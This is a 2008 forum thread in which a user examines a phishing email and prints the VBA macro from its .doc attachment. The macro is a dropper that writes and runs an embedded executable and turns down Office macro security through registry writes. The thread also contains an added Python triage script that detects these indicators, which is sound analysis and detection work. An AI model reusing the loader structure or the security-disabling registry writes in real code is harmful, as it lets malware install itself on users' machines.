malware mail: How stupid do they think I am?
Posted: Tue Sep 09, 2008 2:22 pm
by ^rooker
Today I've received an email that had SPAM/Malware written all over it:
Dear Sir or Madam!
The down payment 447043870189 has been made
9620.00 EURO has been debited from your account.
You will find the itemised costs in the attachment
Zyklop Inkasso Deutschland GmbH
Königsberger Str. 10
D-47809 Krefeld
Managing directors: Lothar Hilse, Gerhard Liebchen
Commercial register: Amtsgericht Krefeld HRB 35 89
Supervisory authority: Landgerichtspräsident Krefeld
VAT ID: DE 120 154 439
Now, come ooooon.... that's ridiculous. So what's the message of that mail? It's probably the attachment:
rechnung.zip, containing something even more suspicious:
rechnung.doc
I hate getting .doc files per mail in general! That file is even 289.280 Bytes in size. So what's in it? A macro - of course:
Posted: Tue Sep 09, 2008 2:27 pm
by ^rooker
Rem Attribute VBA_ModuleType=VBADocumentModule
Sub ThisDocument
Rem Const iSymbols = 45297
Rem Const iBlockCount = 158
Rem Dim b(1 To 158) As String
Rem
Rem Private Sub Shellcode()
Rem b(1) = "77|90|144|0|1|0|0|0|4|0|16|0|255|255|0|0|184|0|0|0|0|0|0|0|64|0|0|0|0|0|..."
Rem End Sub
Rem
Rem Private Sub MyMessage()
Rem End Sub
Rem
Rem
Rem Private Sub Loader()
Rem Dim dumpfile As String: Dim exefile As String
Rem Dim i As Long
Rem Call Shellcode
Rem For i = 1 To iBlockCount
Rem dumpfile = dumpfile & b(i)
Rem Next i
Rem Dim parsearr() As String: parsearr = Split(dumpfile, "|", -1, vbTextCompare)
Rem For i = 0 To iSymbols - 1
Rem exefile = exefile & Chr(parsearr(i))
Rem Next i
Rem Dim NameOfLocalFile As String: Dim PathOfWriteDir As String: Dim DatNr As Integer
Rem NameOfLocalFile = "whlp32.exe"
Rem PathOfWriteDir = Environ("USERPROFILE")
Rem ChDrive (PathOfWriteDir): ChDir (PathOfWriteDir): DatNr = FreeFile(): Open NameOfLocalFile For Binary Access Read Write As DatNr
Rem Put #1, , exefile
Rem Close #1
Rem Shell (NameOfLocalFile)
Rem Call DisableSecurity
Rem Call MyMessage
Rem End Sub
Rem
Rem Private Sub Document_Open()
Rem Call Loader
Rem End Sub
Rem
Rem Private Sub DisableSecurity()
Rem Dim objShell: Set objShell = CreateObject("WScript.Shell"): On Error Resume Next
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
Rem End Sub
Rem
Rem
End Sub
The "Rem"s at the beginning of each line actually disable the whole code - I wonder if that was automatically done by OpenOffice (which I used for opening the file).
The b()="..." is a sequence of ascii codes - according to the number of "0" characters in there it's probably a binary executable.
This is the most bloated, fucked up and insulting "virus" I've ever received... If I wasn't running Linux, I'd probably be scared.
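The two things the poster worked out by eye from the dumped macro can be checked mechanically: the b() strings are a pipe-delimited list of decimal byte values, and 77|90 at the front is "MZ", the DOS/PE header signature, which is why the long runs of zeros look like an executable; and DisableSecurity() writes Office's Security\Level and VBAWarnings registry values to 1, the "Low" / "enable all macros" setting. (The Rem prefixes are what OpenOffice's import filter produces when it loads VBA as comments rather than executable Basic.) The following script is an added triage example, not code from the thread: it decodes a constructed excerpt of the byte list the way the macro's Chr() loop does, reports the MZ/PE check and zero-byte ratio, and scans a constructed excerpt of the macro text for the drop-to-%USERPROFILE%, Shell() and macro-security-downgrade indicators. The sample strings and the function names are assumptions for the example.

```python
"""Static triage of a VBA dropper like the one in the post.

Added example, not part of the original thread. Both sample inputs below
are constructed excerpts modelled on the posted macro.
"""
import re
import struct

# Constructed: the first 30 values of the b(1) string from the post.
SAMPLE_BLOCK = "77|90|144|0|1|0|0|0|4|0|16|0|255|255|0|0|184|0|0|0|0|0|0|0|64|0|0|0|0|0"

# Constructed: a few lines of the macro as OpenOffice dumped it (Rem-prefixed).
SAMPLE_MACRO = r'''
Rem Private Sub Loader()
Rem NameOfLocalFile = "whlp32.exe"
Rem PathOfWriteDir = Environ("USERPROFILE")
Rem Shell (NameOfLocalFile)
Rem Private Sub DisableSecurity()
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
'''

# Matches RegWrite calls that set Office macro security for Word/Excel.
SECURITY_KEY_RE = re.compile(
    r'RegWrite\s+"(HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\[\d.]+\\'
    r'(?:Word|Excel)\\Security\\(?:Level|VBAWarnings))"\s*,\s*(\d+)',
    re.IGNORECASE,
)


def decode_pipe_bytes(block: str) -> bytes:
    """Turn '77|90|144|...' into raw bytes, as the macro's Split/Chr loop does.

    The macro concatenates all b(i) strings first and splits once, so callers
    that have several blocks should join them before calling this.
    """
    vals = [int(v) for v in block.strip().strip("|").split("|") if v != ""]
    if any(v < 0 or v > 255 for v in vals):
        raise ValueError("value outside byte range; not a Chr() byte payload")
    return bytes(vals)


def looks_like_pe(data: bytes) -> dict:
    """Report the MZ signature, whether e_lfanew points at 'PE\\0\\0', and the
    zero-byte ratio (the heuristic the poster used)."""
    info = {"mz": data[:2] == b"MZ", "pe": False, "zero_ratio": 0.0}
    if data:
        info["zero_ratio"] = data.count(0) / len(data)
    # e_lfanew lives at offset 0x3C; only readable when we have a full DOS header.
    if info["mz"] and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        info["pe"] = data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
    return info


def find_macro_security_downgrades(macro_text: str) -> list:
    """Return (registry key, value) pairs written by the macro. Value 1 means
    'Low' for Security\\Level and 'enable all macros' for VBAWarnings."""
    return [(key, int(val)) for key, val in SECURITY_KEY_RE.findall(macro_text)]


def triage(macro_text: str, blocks: list) -> dict:
    """Combine the checks into one indicator summary for the document."""
    payload = decode_pipe_bytes("".join(blocks))
    pe = looks_like_pe(payload)
    return {
        "embedded_pe": pe["mz"],
        "zero_ratio": round(pe["zero_ratio"], 3),
        "drops_to_userprofile": 'Environ("USERPROFILE")' in macro_text,
        "executes_dropped_file": re.search(r"\bShell\s*\(", macro_text) is not None,
        "security_downgrades": find_macro_security_downgrades(macro_text),
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_MACRO, [SAMPLE_BLOCK]).items():
        print(f"{k}: {v}")
```

On the 30-value excerpt the MZ check passes but the PE check cannot, since the DOS header alone is 64 bytes; run it on the full concatenated b() strings to get the e_lfanew lookup and a meaningful zero ratio. The registry pattern is also a reasonable thing to alert on from endpoint telemetry: a Word process writing to HKCU\Software\Microsoft\Office\*\Security\Level or VBAWarnings is rarely legitimate.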
Posted: Wed Dec 03, 2008 4:40 pm
by carmofin
where did *she* get that amount of money from?
Posted: Wed Dec 03, 2008 6:04 pm
by ^rooker
400.000 USD??
wow.